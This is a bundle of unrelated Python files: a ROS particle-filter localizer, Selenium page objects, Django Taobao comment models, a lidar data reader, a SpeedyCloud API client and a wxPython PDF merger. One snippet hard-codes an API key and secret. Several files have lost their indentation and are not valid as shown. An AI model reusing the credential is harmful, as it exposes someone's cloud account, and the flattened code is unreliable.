# Assemble the table column by column; pandas raises ValueError if the
# scraped column lengths differ (same behaviour as before).
df = pd.DataFrame()
df['Review_title'] = review_title
df['Ratings'] = rate
df['Reviews'] = review_content
df.to_csv(r'F:\MLP_SPYDER\headset_review2.csv', index=True)
#!/usr/bin/python
import Tkinter as tk
import ImageTk
import bisect
import numpy as np
from PIL import Image
import random
import rospy
import tf
import math
import Queue
import itertools
import colorsys
from threading import Timer
from nav_msgs.msg import Odometry
from sensor_msgs.msg import LaserScan
from p2os_msgs.msg import SonarArray
from geometry_msgs.msg import Quaternion
from std_msgs.msg import String
from functools import partial
from multiprocessing import Pool
from Utils import initialize_cspace
from Particle import *
def oval(x, y):
    """Return the (x0, y0, x1, y1) bounding box of a 2x2 square centred on (x, y)."""
    offsets = (-1, -1, 1, 1)
    return tuple(c + d for c, d in zip((x, y, x, y), offsets))
class Localizer(tk.Frame):
def update_image(self):
self.mapimage = ImageTk.PhotoImage(self.themap)
self.canvas.create_image(2000 / 2, 700 / 2, image=self.mapimage)
def render_particles(self, root=None):
if self.no_flash_gui:
self.canvas.delete("particles")
for p in self.particles:
self.canvas.create_oval(oval(p.mx, p.my), tags="particles")
root.after(500, self.render_particles, root)
else:
self.reset_map()
for p in self.obs_points:
r, g, b = (255, 100, 0)
color = (int(r), int(g), int(b))
self.mappix[p[0], p[1]] = color
self.mappix[p[0]+1, p[1]] = color
self.mappix[p[0]+1, p[1]+1] = color
self.mappix[p[0], p[1]+1] = color
self.obs_points = []
for p in self.particles:
h = 0.33 * p.p
r, g, b = colorsys.hls_to_rgb(h, 127, -1)
color = (int(r), int(g), int(b))
self.mappix[p.mx, p.my] = color
self.update_image()
def reset_map(self):
self.themap = Image.open(self.mapfile, mode='r')
self.themap = self.themap.convert("RGB")
self.mapimage = ImageTk.PhotoImage(self.themap)
self.mappix = self.themap.load()
self.update_image()
def __init__(self, supplied_map, *args, **kwargs):
tk.Frame.__init__(self, *args, **kwargs)
self.master.title("Localizer")
self.master.minsize(width=2000, height=700)
self.mapfile = supplied_map
self.themap = Image.open(self.mapfile, mode='r')
self.themap = self.themap.convert("RGB")
self.mapimage = ImageTk.PhotoImage(self.themap)
self.mappix = self.themap.load()
self.canvas = tk.Canvas(self, width=2000, height=700)
self.map_on_canvas = self.canvas.create_image(2000 / 2, 700 / 2, image=self.mapimage)
self.canvas.pack()
self.pack()
self.render_flag = True
self.no_flash_gui = False
self.maparr = np.asarray(self.themap)
self.landmarks = [[-12.0, 12.0, 180], [10.8, 12.7, 180], [8, -0.5, 90], [-18.4, -8.9, 0], [-54.5, 7.6, 90], [8, -1.5, 270]]
#self.landmarks = [[8, -1.5, 270]]
#self.landmarks = [[-54.5, 7.6, 90]]
#self.landmarks = [[10.8, 12.7, 180], [8, -1.5, 270]]
#self.particles = Particle.scatter_near_test(100, self.landmarks, self.maparr, maintain_start_angle=True)
self.particles = Particle.scatter_near_landmarks(PARTICLES_PER_LANDMARK, self.landmarks, self.maparr, maintain_start_angle=True)
#self.particles = Particle.scatter_around_map(20000,self.maparr)
self.obs_points = []
self.render_particles()
# odom
self.ang_delta = 0
self.fwd_delta = 0
self.last_theta = 0.0
self.last_x = 0.0
self.last_y = 0.0
# sensors
self.laser_queue = Queue.LifoQueue()
self.odom_queue = Queue.LifoQueue()
self.count = 0
self.goal_pub = rospy.Publisher('/localized_pos', String, queue_size=1)
self.task_pool = Pool(processes=5)
def resample(self, count):
"""
Re-samples particles. Function gets rid of dead particles, normalizes probabilities
and then spreads out the probs in a [0,1] number line as sorted cumulative list.
Pick a random float in [0, 1] and use the corresponding particle at index to get a new particle.
Particles with higher probs have a larger "share" in the line and have a larger chance of being cloned.
:param count: the number of particles to resample.
:return:
"""
print 'Resampling ', count, 'new particles'
self.normalize_particles()
# Cumulative probabilities for weighted distribution
cumul_probs = [_.p for _ in self.particles]
cumul_probs = np.cumsum(cumul_probs)
# Re-sample particles with probability equivalent to weights
for _ in range(count):
rand_p = random.uniform(0, 1)
i = bisect.bisect_left(cumul_probs, rand_p)
try:
self.particles.append(self.particles[i].clone(self.maparr, with_noise=True))
except IndexError:
pass
def normalize_particles(self):
min_x = min(_.p for _ in self.particles)
max_x = max(_.p for _ in self.particles)
if min_x != max_x:
for i in range(len(self.particles)):
self.particles[i].p = (self.particles[i].p - min_x) / (max_x - min_x)
def remove_dead_particles(self, strategy=None):
self.particles = filter(lambda p: p.p > THRESHOLD, self.particles)
def odom_update(self, omsg):
self.odom_queue.put(omsg)
def get_movement(self):
omsg = self.odom_queue.get()
if omsg is None:
return None
self.odom_queue.queue[:] = []
x = omsg.pose.pose.position.x
y = omsg.pose.pose.position.y
q = (omsg.pose.pose.orientation.x,
omsg.pose.pose.orientation.y,
omsg.pose.pose.orientation.z,
omsg.pose.pose.orientation.w)
euler = tf.transformations.euler_from_quaternion(q)
d_theta = (self.last_theta - euler[2])
d_theta = (d_theta + math.pi % (2.0 * math.pi)) - math.pi
# print 'last', self.last_theta, 'new', euler[2], 'dtheta', d_theta
dx = self.last_x - x
dy = self.last_y - y
dist = math.sqrt(dx**2 + dy**2)
dist = dist if dist > 0.15 else 0
if dist > 0:
self.last_x = x
self.last_y = y
if abs(d_theta) < 0.08:
d_theta = 0
else:
self.last_theta = euler[2]
# todo -dtheta is hack. robot was turning in the opposite direction. Fix needed
return (x, y), dist, -d_theta, euler[2]
def update(self):
count = 0
while True:
start_time = rospy.get_time()
count += 1
mov = self.get_movement()
if mov is None:
continue
ox, oy = mov[0][0], mov[0][1]
dist, dtheta = mov[1], mov[2]
otheta = mov[3]
if dist == 0 and dtheta == 0:
continue
for p in self.particles:
p.move(dist, math.degrees(dtheta), self.maparr)
lmsg = self.get_laser_msg()
if lmsg is None:
continue
readings = self.get_robot_readings(lmsg)
step = 0.00158544606529
idx = [int(np.radians(dtheta)/step) for dtheta in range(0, 60, 2)]
rread = []
for i in idx:
if math.isnan(readings[i]):
rread.append(10.0)
else:
rread.append(readings[i])
for p in self.particles:
pread, locs = p.sense(self.maparr)
self.obs_points += locs
p.p *= prob_diff_readings(rread, pread)
for p in self.particles:
print(p.p)
end_time = rospy.get_time()
print("Time taken %d seconds"%(end_time -start_time))
centroid = self.converged_loc(strategy="centroid")
if centroid is not None:
extra_mov = self.get_movement()
nx, ny = extra_mov[0][0], extra_mov[0][1]
ntheta = extra_mov[3]
median_angle = math.radians(np.median([p.theta for p in self.particles])) % (2.0 * math.pi)
lx, ly = centroid[0], centroid[1]
xx = median_angle - otheta
adjust_x = nx * np.cos(xx) - ny * np.sin(xx) + lx
adjust_y = ny * np.sin(xx) + ny * np.cos(xx) + ly
adjust_theta = ntheta + xx
print("Converged at <%0.2f,%0.2f>@%0.2f"%(centroid[0], centroid[1], median_angle))
print("Adjusted convergence at <%0.2f,%0.2f>@%0.2f"%(adjust_x, adjust_y, adjust_theta))
#goal_str = '{0} {1} {2}'.format(centroid[0], centroid[1], median_angle)
goal_str = '{0} {1} {2}'.format(adjust_x, adjust_y, xx)
self.goal_pub.publish(goal_str)
self.normalize_particles()
self.remove_dead_particles()
self.resample_if_required()
self.render_particles()
def get_laser_msg(self):
msg = self.laser_queue.get()
self.laser_queue.queue[:] = []
return msg
def get_robot_readings(self, lmsg):
msg = self.laser_queue.get()
r = msg.ranges
return r
def resample_if_required(self):
if len(self.particles) < RESAMPLE_THRESHOLD:
self.resample(TOTAL_PARTICLES - len(self.particles))
    def converged_loc(self, strategy="centroid"):
        """Decide whether the particle cloud has converged.

        With strategy="centroid": returns the (x, y, theta) mean of all
        particles when more than CENTROID_THRESHOLD particles lie within
        distance 1 of it, else None.
        With any other strategy: returns a bool (bounding-box area below
        BOUNDING_BOX_AREA_CONVERGENCE).  Note the two branches return
        different types — callers must know which strategy they asked for.
        """
        if strategy == "centroid":
            coords = np.asarray([(p.x, p.y, p.theta) for p in self.particles])
            sum_x = np.sum(coords[:, 0])
            sum_y = np.sum(coords[:, 1])
            sum_z = np.sum(coords[:, 2])
            # Diagnostics only: angle spread and median (degrees, mod 360).
            min_a = min([p.theta % 360 for p in self.particles])
            max_a = max([p.theta % 360 for p in self.particles])
            median_angle = np.median([p.theta for p in self.particles]) % 360
            print("min angle %0.2f, max angle %0.2f, med angle %0.2f"%(min_a, max_a, median_angle))
            # NOTE(review): the returned theta is the *mean* angle (sum_z),
            # while the log shows the median — confirm which is intended.
            centroid = sum_x / len(coords), sum_y / len(coords), sum_z / len(coords)
            particles_near_centroid = len([1 for p in self.particles if p.d3_get_distance_to(*centroid) < 1])
            if particles_near_centroid > CENTROID_THRESHOLD:
                return centroid
            else:
                return None
        else:
            # Bounding box. Is not complete. How to eliminate outliers?
            min_x, max_x, min_y, max_y = float('inf'), float('-inf'), float('inf'), float('-inf')
            for p in self.particles:
                if p.p == 0:
                    # Dead particles do not contribute to the box.
                    continue
                min_x = min(min_x, p.x)
                max_x = max(max_x, p.x)
                min_y = min(min_y, p.y)
                max_y = max(max_y, p.y)
            width = max_x - min_x
            height = max_y - min_y
            area = width * height
            return area < BOUNDING_BOX_AREA_CONVERGENCE
def laser_update(self, lmsg):
self.laser_queue.put(lmsg)
#def sonar_update(self, smsg):
# self.sonar_queue.put(smsg)
def main():
    """Start the localization node: ROS init, Tk window, subscribers, timer."""
    rospy.init_node("localize", anonymous=True)
    root = tk.Tk()
    initialize_cspace()
    #l = Localizer('/home/stu12/s11/mhs1841/catkin_ws/src/hw1/src/scripts/project.png', master=root, height=700, width=2000)
    # we are bad people
    # NOTE(review): hard-coded absolute path to the map image; make configurable.
    l = Localizer('/home/stu9/s4/bwb5381/project.png', master=root, height=700, width=2000)
    #rospy.Subscriber("/r1/kinect_laser/scan", LaserScan, l.laser_update)
    #rospy.Subscriber("/r1/odom", Odometry, l.odom_update)
    rospy.Subscriber("/scan", LaserScan, l.laser_update)
    rospy.Subscriber("/pose", Odometry, l.odom_update)
    # Kick off the particle-filter loop shortly after the UI starts.
    t = Timer(0.1, l.update)
    t.start()
    root.mainloop()
if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import time
import pytest
from selenium import webdriver
@pytest.fixture(scope='module')
def webfront(agent):
    # The 'webfront' service resolved from the shared agent context.
    return agent.context().lookup('webfront')
@pytest.fixture(scope='module')
def server_url(webfront):
    # Allow CI to point the tests at a remote deployment via AVA_TEST_URL;
    # fall back to the locally running webfront.
    return os.environ.get('AVA_TEST_URL', webfront.local_base_url)
@pytest.fixture(scope='module')
def access_token(webfront):
    # Token used by WebPage.login() via the '#login/<token>' fragment URL.
    return webfront.access_token
@pytest.fixture
def browser(request):
    """Create a Selenium WebDriver chosen via AVA_TEST_BROWSER (default Firefox).

    BUG FIX: the 'PhantomJS' branch used a separate ``if``, so after
    creating a PhantomJS driver the chain fell through to ``else`` and
    replaced it with Firefox (leaking the PhantomJS process); it is now
    part of the ``elif`` chain.
    """
    browser_type = os.environ.get('AVA_TEST_BROWSER', 'Firefox')
    if browser_type == 'PhantomJS':
        b = webdriver.PhantomJS()
    elif browser_type == 'Chrome':
        b = webdriver.Chrome()
    elif browser_type == 'Opera':
        b = webdriver.Opera()
    elif browser_type == 'IE':
        b = webdriver.Ie()
    elif browser_type == 'Safari':
        b = webdriver.Safari()
    elif browser_type == 'Remote':
        b = webdriver.Remote()
    else:
        b = webdriver.Firefox()
    b.implicitly_wait(5)
    def teardown_browser():
        # Always quit the driver when the test using it finishes.
        b.quit()
    request.addfinalizer(teardown_browser)
    return b
class WebPage(object):
    """Base page object wrapping a Selenium browser for the web front-end.

    Concrete pages subclass this and override open(); navigation, dialog
    and element-lookup helpers live here.
    """
    def __init__(self, browser, base_url, access_token=None):
        # browser: Selenium WebDriver; base_url: site root URL;
        # access_token: optional token for the hash-fragment login route.
        self.browser = browser
        self.base_url = base_url
        self.access_token = access_token
    def open(self):
        """Navigate to the site root."""
        self.browser.get(self.base_url)
    def login(self):
        """Log in via the token-bearing '#login/<token>' fragment URL."""
        self.browser.get(self.base_url + '#login/' + self.access_token)
    def click_user_panel_btn(self):
        """Open the user panel from the navigation bar."""
        btn = self.find_element_by_xpath("//a[@href='#user_panel']")
        btn.click()
    def click_logout_button(self):
        """Click the logout link inside the user panel."""
        logout_btn = self.find_element_by_xpath("//a[@href='#logout']")
        logout_btn.click()
    def click_yes_on_confirm(self):
        """Accept the current confirmation dialog."""
        yes_btn = self.find_element_by_id('yesBtn')
        yes_btn.click()
    def click_no_on_confirm(self):
        """Dismiss the current confirmation dialog."""
        no_btn = self.find_element_by_id('noBtn')
        no_btn.click()
    def click_ok_on_message_box(self):
        """Dismiss the current message box."""
        # NOTE(review): this looks up 'noBtn', the same id used by
        # click_no_on_confirm — presumably the message box reuses that
        # element, but confirm it should not be an 'okBtn'.
        ok_btn = self.find_element_by_id('noBtn')
        ok_btn.click()
    def logout(self):
        """Full logout flow: panel -> logout -> confirm -> dismiss message."""
        self.click_user_panel_btn()
        self.click_logout_button()
        self.click_yes_on_confirm()
        self.click_ok_on_message_box()
    # Thin pass-throughs to the underlying WebDriver lookup API.
    def find_element_by_id(self, elmt_id):
        return self.browser.find_element_by_id(elmt_id)
    def find_elements_by_id(self, elmt_id):
        return self.browser.find_elements_by_id(elmt_id)
    def find_element_by_tag_name(self, tag_name):
        return self.browser.find_element_by_tag_name(tag_name)
    def find_elements_by_tag_name(self, tag_name):
        return self.browser.find_elements_by_tag_name(tag_name)
    def find_element_by_xpath(self, xpath):
        return self.browser.find_element_by_xpath(xpath)
    def find_elements_by_xpath(self, xpath):
        return self.browser.find_elements_by_xpath(xpath)
    def sleep(self, secs):
        """Crude fixed wait; prefer explicit waits where possible."""
        time.sleep(secs)
    def assert_front_page(self):
        """Fail unless the current page shows the EAvatar title header."""
        header = self.find_element_by_xpath("//div/div/h1[@class='ui-title']")
        assert 'EAvatar' in header.text
class FrontPage(WebPage):
    """Page object for the public front page; adds nothing beyond WebPage."""
    # The original defined an __init__ that only delegated to WebPage;
    # inheriting it directly is behaviorally identical.
    pass
class HomePage(WebPage):
    """Page object for the authenticated home page."""

    def open(self):
        # Opening the home page means logging in and verifying the header.
        self.login()
        self.assert_front_page()
class ConsolePage(WebPage):
    """Page object for the console view, reached from the home page."""

    def open(self):
        # Authenticate, confirm the front page, then follow the console link.
        self.login()
        self.assert_front_page()
        self.browser.find_element_by_id('console_link').click()
class NoticesPage(WebPage):
    """Page object for the notices view, reached from the home page."""

    def open(self):
        # Authenticate, confirm the front page, then follow the notices link.
        self.login()
        self.assert_front_page()
        self.browser.find_element_by_id('notices_link').click()
class ScriptsPage(WebPage):
    """Page object for the scripts view, reached via its anchor link."""

    def open(self):
        # Authenticate, confirm the front page, then follow the scripts anchor.
        self.login()
        self.assert_front_page()
        self.browser.find_element_by_xpath("//a[@href='#scripts']").click()
class JobsPage(WebPage):
    """Page object for the jobs list, reached from the home page."""

    def open(self):
        # Authenticate, confirm the front page, then follow the jobs link.
        self.login()
        self.assert_front_page()
        self.browser.find_element_by_id("jobs_link").click()
class LogsPage(WebPage):
    """Page object for the logs view, reached from the home page."""

    def open(self):
        # Authenticate, confirm the front page, then follow the logs link.
        self.login()
        self.assert_front_page()
        self.browser.find_element_by_id("logs_link").click()
class OptionsPage(WebPage):
def __init__(self, *args, **kwargs):
super(OptionsPage, self).__init__(*args, **kwargs)
def open(self):
self.login()
# click the 'Recent Logs' button
|
#-*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from shopback.base.fields import BigIntegerAutoField
# Role of the rated party in the trade: seller or buyer.
ROLE_CHOICES = (
    ('seller',u'卖家'),
    ('buyer',u'买家')
)
# Rating outcome: good / neutral / bad.
RESULT_CHOICES = (
    ('good',u'好评'),
    ('neutral',u'中评'),
    ('bad',u'差评'),
)
class Comment(models.Model):
    """A Taobao trade comment/rating on one order of one item.

    Uniquely identified by (item id, trade id, order id, role); supports
    posting a seller explanation back to Taobao via reply_order_comment().
    """
    id = BigIntegerAutoField(primary_key=True)
    num_iid = models.BigIntegerField(null=False,db_index=True,verbose_name=u'商品ID')
    tid = models.BigIntegerField(null=False,db_index=True,verbose_name=u'交易ID')
    oid = models.BigIntegerField(null=False,db_index=True,verbose_name=u'订单ID')
    item_title = models.CharField(max_length=148,blank=True,verbose_name=u'商品标题')
    # NOTE(review): URLField(verify_exists=...) was dropped in newer Django
    # versions — confirm the Django version this code targets.
    item_pic_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'商品图片')
    detail_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'详情链接')
    item_price = models.DecimalField(max_digits=10,null=True,decimal_places=2,verbose_name=u'商品价格')
    valid_score = models.BooleanField(default=True,verbose_name=u'是否记分')
    role = models.CharField(max_length=8,choices=ROLE_CHOICES,verbose_name=u'角色')
    result = models.CharField(max_length=8,blank=True,choices=RESULT_CHOICES,verbose_name=u'评价结果')
    nick = models.CharField(max_length=32,blank=True,verbose_name=u'评价者')
    rated_nick = models.CharField(max_length=32,blank=True,verbose_name=u'被评价者')
    content = models.CharField(max_length=1500,blank=True,verbose_name=u'评价内容')
    reply = models.CharField(max_length=1500,blank=True,verbose_name=u'评价解释')
    is_reply = models.BooleanField(default=False,verbose_name=u'已解释')
    ignored = models.BooleanField(default=False,verbose_name=u'已忽略')
    replayer = models.ForeignKey(User,null=True,default=None,verbose_name=u'评价人')
    replay_at = models.DateTimeField(db_index=True,blank=True,null=True,verbose_name=u'解释日期')
    created = models.DateTimeField(blank=True,null=True,verbose_name=u'创建日期')
    class Meta:
        db_table = 'shop_comments_comment'
        unique_together = ('num_iid', 'tid', 'oid', 'role')
        verbose_name = u'交易评论'
        verbose_name_plural = u'交易评论列表'
    def reply_order_comment(self,content,replayer):
        """Post *content* as an explanation to Taobao, then record it locally.

        Raises Exception when the Taobao API reports failure; on success
        updates reply/replayer/replay_at/is_reply and saves the row.
        """
        # Local imports avoid a circular dependency at module load time.
        import datetime
        from auth import apis
        from shopback.items.models import Item
        rel_item = Item.objects.get(num_iid=self.num_iid)
        res = apis.taobao_traderate_explain_add(oid=self.oid,
                                                reply=content,
                                                tb_user_id=rel_item.user.visitor_id)
        if not res['traderate_explain_add_response']['is_success']:
            raise Exception('解释失败!')
        self.reply = content
        self.replayer = replayer
        self.replay_at = datetime.datetime.now()
        self.is_reply = True
        self.save()
class CommentItem(models.Model):
    """A product that has received comments; cached item metadata for display."""
    num_iid = models.BigIntegerField(primary_key=True,verbose_name=u'商品ID')
    title = models.CharField(max_length=64,blank=True,verbose_name=u'标题')
    # NOTE(review): URLField(verify_exists=...) was dropped in newer Django
    # versions — confirm the Django version this code targets.
    pic_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'商品图片')
    detail_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'详情链接')
    updated = models.DateTimeField(blank=True,null=True,verbose_name=u'更新日期')
    is_active = models.BooleanField(default=True,verbose_name=u'有效')
    class Meta:
        db_table = 'shop_comments_commentitem'
        verbose_name = u'评价商品'
        verbose_name_plural = u'评价商品列表'
class CommentGrade(models.Model):
    """Quality grade assigned to a comment reply, keyed by (item, trade, order)."""
    # Grade values: 1 = excellent, 2 = acceptable, 0 = unacceptable.
    GRADE_GOOD = 1
    GRADE_NORMAL = 2
    GRADE_BAD = 0
    GRADE_CHOICE = (
        (GRADE_GOOD,u'优秀'),
        (GRADE_NORMAL,u'合格'),
        (GRADE_BAD,u'不合格'),
    )
    id = BigIntegerAutoField(primary_key=True)
    num_iid = models.BigIntegerField(null=False,verbose_name=u'商品ID')
    tid = models.BigIntegerField(null=False,db_index=True,verbose_name=u'交易ID')
    oid = models.BigIntegerField(null=False,verbose_name=u'订单ID')
    reply = models.TextField(max_length=1500,blank=True,verbose_name=u'评价解释')
    # NOTE(review): auto_now=True refreshes this timestamp on every save,
    # which conflicts with a "creation date" label — auto_now_add may have
    # been intended; confirm before changing.
    created = models.DateTimeField(blank=True,null=True,auto_now=True,verbose_name=u'创建日期')
    replay_at = models.DateTimeField(db_index=True,blank=True,null=True,verbose_name=u'解释日期')
    replayer = models.ForeignKey(User,null=True,default=None,related_name='grade_replyers',verbose_name=u'评价人')
    grader = models.ForeignKey(User,null=True,default=None,related_name='grade_maker',verbose_name=u'打分人')
    grade = models.IntegerField(default=GRADE_BAD,choices=GRADE_CHOICE,verbose_name=u'评价打分')
    # item_pic_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'商品图片')
    # detail_url = models.URLField(verify_exists=False,blank=True,verbose_name=u'详情链接')
    # content = models.CharField(max_length=1500,blank=True,verbose_name=u'评价内容')
    class Meta:
        db_table = 'shop_comments_grade'
        unique_together = ('num_iid', 'tid', 'oid')
        verbose_name = u'评论打分'
        verbose_name_plural = u'评论打分列表'
|
import os
import numpy as np
import json
import struct
import open3d
# data_set_file = os.getcwd()+'\\data_set\\lidar_semantic_bboxes\\'
def read_file(file_name=os.getcwd()+'\\data_set\\lidar_semantic_bboxes\\'):
    """Collect dataset file paths under *file_name* (Windows-style path).

    Returns two lists: the lidar point-cloud .npz paths and the 3D-label
    .json paths for the front-center camera, one entry per recording dir.
    """
    npz_dir = []
    _3D_label_dir = []
    for entry in os.listdir(file_name):
        if not os.path.isdir(file_name + entry):
            continue
        lidar_dir = file_name + entry + '\\lidar\\cam_front_center'
        npz_dir.extend(lidar_dir + '\\' + name for name in os.listdir(lidar_dir))
        label_dir = file_name + entry + '\\label3D\\cam_front_center'
        _3D_label_dir.extend(label_dir + '\\' + name for name in os.listdir(label_dir))
    return npz_dir, _3D_label_dir
def read_npz(file_path):
    """Load the 3-D point cloud (member 'points') from an .npz archive.

    np.load on an .npz returns a lazy archive object; index it by member
    name (use ``np.load(path).files`` to list the members).
    """
    archive = np.load(file_path)
    return archive['points']
def read_json(file_path):
    """Parse a JSON label file and return the decoded object (list of dicts)."""
    with open(file_path, 'r') as handle:
        return json.load(handle)
def read_bin(path):
    """Read a KITTI-style binary point cloud of float32 (x, y, z, intensity).

    The intensity channel is dropped; returns an (N, 3) float64 array.
    """
    with open(path, 'rb') as handle:
        raw = handle.read()
    xyz = [[x, y, z] for x, y, z, _ in struct.iter_unpack('ffff', raw)]
    return np.asarray(xyz, dtype=np.float64)
|
from speedycloud.products.cloud_server import CloudServerAPI
# SECURITY(review): a real-looking API key/secret pair is committed here in
# plain text — rotate these credentials and load them from the environment
# or a secrets store instead of source control.
api = CloudServerAPI('F8592B402380432895EA8C12BEBF2222', '0eb7bc8c4aa154ce6abb799e4149417ca9b90a5eeb82789d2326082a5b5d2222')
# Usage examples (Python 2 print statements), kept for reference:
# print api.get_available_zone()
# print api.get_support_isps('SPC-HK-2-A')
# print api.get_os_images('SPC-HK-2-A')
# print api.list()
# print api.provision('SPC-HK-2-A', 'BGP', 'CentOS 7 x64', 1, 1024, 20, 1, private_network='net-zmtyhsbv', price_type='by-month')
# print api.detail(72315)
# print api.backups(72315)
# print api.jobs(72315)
# print api.start(72315)
# print api.restart(72315)
# print api.stop(72315)
# print api.suspend(72315)
# print api.resume(72315)
# print api.backup(72315, 'myBackup1')
# print api.restore_backup(72315, 'myBackup')
# print api.delete_backup(72315, 'myBackup1')
# print api.set_tag(72315, 'myTag')
# print api.set_alias(72315, 'myAlias')
# print api.set_group(72315, 'myGroup')
# print api.change_image(72315, 'Debian 6.0.1')
# print api.attach_disk(72315, 'v-hoabqsir')
# print api.detach_disk(72315, 'v-hoabqsir')
# print api.get_support_images('SPC-BJ-T01')
|
#-*- coding: utf-8 -*-
import wx
import win32api
import sys, os
import logging
from FileListTable import *
from APDFTool import APDFTool
# Window title and icon file (icon is looked up next to the script unless frozen).
APP_TITLE = u'PDF Document Merge Tool'
APP_ICON = 'pdf_maker.ico'
class mainFrame(wx.Frame):
    """Main window of the PDF merge tool.

    Left side: a grid listing the selected PDFs plus a progress gauge.
    Right side: Open / move-up / move-down / Merge / Clear buttons.
    """
    def __init__(self):
        wx.Frame.__init__(self, None, -1, APP_TITLE, style=wx.DEFAULT_FRAME_STYLE ^ wx.RESIZE_BORDER)
        # The default style is the combination of: wx.MINIMIZE_BOX | wx.MAXIMIZE_BOX |
        # wx.RESIZE_BORDER | wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN
        self.SetBackgroundColour(wx.Colour(224,224,224))
        self.SetSize((800, 600))
        self.Center()
        # Frozen (exe) builds carry the icon inside the executable itself.
        if hasattr(sys, "frozen") and getattr(sys, "frozen"):
            exeName = win32api.GetModuleFileName(win32api.GetModuleHandle(None))
            icon = wx.Icon(exeName, wx.BITMAP_TYPE_ICO)
        else:
            icon = wx.Icon(APP_ICON, wx.BITMAP_TYPE_ICO)
        self.SetIcon(icon)
        # left
        panelLeft = wx.BoxSizer(wx.VERTICAL)
        gridDatas = []
        self.gridTable = wx.grid.Grid(self, -1, pos=(5,5), size=(400, 400), style=wx.WANTS_CHARS)
        self.infoTable = FileListGridTable(gridDatas)
        self.gridTable.SetTable(self.infoTable, True)
        self.gauge = wx.Gauge(self, range = 20, size = (250, 25), style = wx.GA_HORIZONTAL)
        panelLeft.Add(self.gridTable, 0, wx.EXPAND|wx.ALL, 5)
        panelLeft.Add(self.gauge, 0, wx.EXPAND|wx.ALL, 5)
        # right
        panelRight = wx.BoxSizer(wx.VERTICAL)
        btnOpenFiles = wx.Button(self, -1, u'Open', size=(50, 50))
        btnOpenFiles.Bind(wx.EVT_BUTTON, self.OpenFiles)
        btnMoveUp = wx.Button(self, -1, u'↑', size=(50, 50))
        btnMoveUp.Bind(wx.EVT_BUTTON, self.MoveUp)
        btnMoveDown = wx.Button(self, -1, u'↓', size=(50, 50))
        btnMoveDown.Bind(wx.EVT_BUTTON, self.MoveDown)
        btnMerge = wx.Button(self, -1, u'Merge', size=(50,50))
        btnMerge.Bind(wx.EVT_BUTTON, self.MergePDFFiles)
        btnClear = wx.Button(self, -1, u'Clear', size=(50,50))
        btnClear.Bind(wx.EVT_BUTTON, self.ClearFiles)
        panelRight.Add(btnOpenFiles, 0, wx.ALL, 10)
        panelRight.Add(btnMoveUp, 0, wx.ALL, 10)
        panelRight.Add(btnMoveDown, 0, wx.ALL, 10)
        panelRight.Add(btnMerge, 0, wx.ALL, 10)
        panelRight.Add(btnClear, 0, wx.ALL, 10)
        mainBox = wx.BoxSizer(wx.HORIZONTAL)
        mainBox.Add(panelLeft, 1, wx.EXPAND|wx.LEFT|wx.TOP|wx.BOTTOM, 5)
        mainBox.Add(panelRight, 0, wx.EXPAND|wx.ALL, 20)
        self.Bind(wx.EVT_CLOSE, self.OnClose)
        self.Bind(wx.EVT_SIZE, self.OnResize)
        self.SetAutoLayout(True)
        self.SetSizer(mainBox)
        self.Layout()
        logging.basicConfig(level = logging.INFO,format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        self.logger = logging.getLogger(__name__)
    def MoveUp(self, evt):
        """Move each selected grid row up one position."""
        # NOTE(review): with several selected rows the indices are not
        # re-adjusted after each move — verify multi-row moves behave as intended.
        selectedRows = self.gridTable.GetSelectedRows()
        self.logger.info(selectedRows)
        for row in selectedRows:
            self.logger.info(row)
            self.infoTable.RowMoveUp(row)
    def MoveDown(self, evt):
        """Move each selected grid row down one position."""
        selectedRows = self.gridTable.GetSelectedRows()
        self.logger.info(selectedRows)
        for row in selectedRows:
            self.logger.info(row)
            self.infoTable.RowMoveDown(row)
    def ClearFiles(self, evt):
        """Remove every file from the grid."""
        self.infoTable.ClearRows()
    def MergePDFFiles(self, evt):
        """Merge the listed PDFs (in grid order) into a user-chosen output file."""
        def SetUageValue(value):
            # Progress callback handed to APDFTool.merge (name kept as-is).
            self.gauge.SetValue(value)
        rowsCount = self.infoTable.GetNumberRows()
        files = []
        for i in range(rowsCount):
            files.append(self.infoTable.GetValue(i, 1))  # column 1 holds the full path
        if len(files):
            # NOTE(review): if the user cancels the save dialog,
            # self.save_pdf_path is never set and merge() below raises
            # AttributeError — this path needs a guard.
            self.saveFile()
            tool = APDFTool(files)
            pageCount = tool.getTotalPageCount()
            self.gauge.SetRange(pageCount)
            tool.merge(self.save_pdf_path, SetUageValue)
    def saveFile(self):
        """Ask for the output .pdf path and store it in self.save_pdf_path."""
        file_wildcard = "PDF files(*.pdf)|*.pdf"
        # NOTE(review): this is the save-target dialog but the title says
        # "Choose PDF files to merge..." — confirm the intended wording.
        dlg = wx.FileDialog(self, "Choose PDF files to merge...",
                            os.getcwd(),
                            style = wx.FD_SAVE,
                            wildcard = file_wildcard)
        if dlg.ShowModal() == wx.ID_OK:
            paths = dlg.GetPaths()
            for path in paths:
                self.save_pdf_path = path
        dlg.Destroy()
    def OpenFiles(self, evt):
        '''
        Let the user pick one or more PDFs and append each to the grid
        as (basename, full path, page count).
        '''
        file_wildcard = "PDF files(*.pdf)|*.pdf"
        dlg = wx.FileDialog(self, "Choose PDF files to merge...",
                            os.getcwd(),
                            style = wx.FD_OPEN|wx.FD_MULTIPLE,
                            wildcard = file_wildcard)
        if dlg.ShowModal() == wx.ID_OK:
            paths = dlg.GetPaths()
            for path in paths:
                files = []
                files.append(path)
                tool = APDFTool(files)
                count = tool.getTotalPageCount()
                self.infoTable.AppendRows([os.path.basename(path), path, count])
        dlg.Destroy()
    def OnResize(self, evt):
        """Repaint on resize and let the default handler continue."""
        self.Refresh()
        evt.Skip()
    def OnClose(self, evt):
        """Destroy the frame when the window is closed."""
        self.Destroy()
class mainApp(wx.App):
    """wx application bootstrap: names the app and shows the main frame."""
    def OnInit(self):
        self.SetAppName(APP_TITLE)
        self.Frame = mainFrame()
        self.Frame.Show()
        return True
if __name__ == "__main__":
app = mainApp(redirect=True, filename="debug.log")
app.MainLoop() |
# Enthought library imports.
from traits.api import HasTraits, Instance, Vetoable
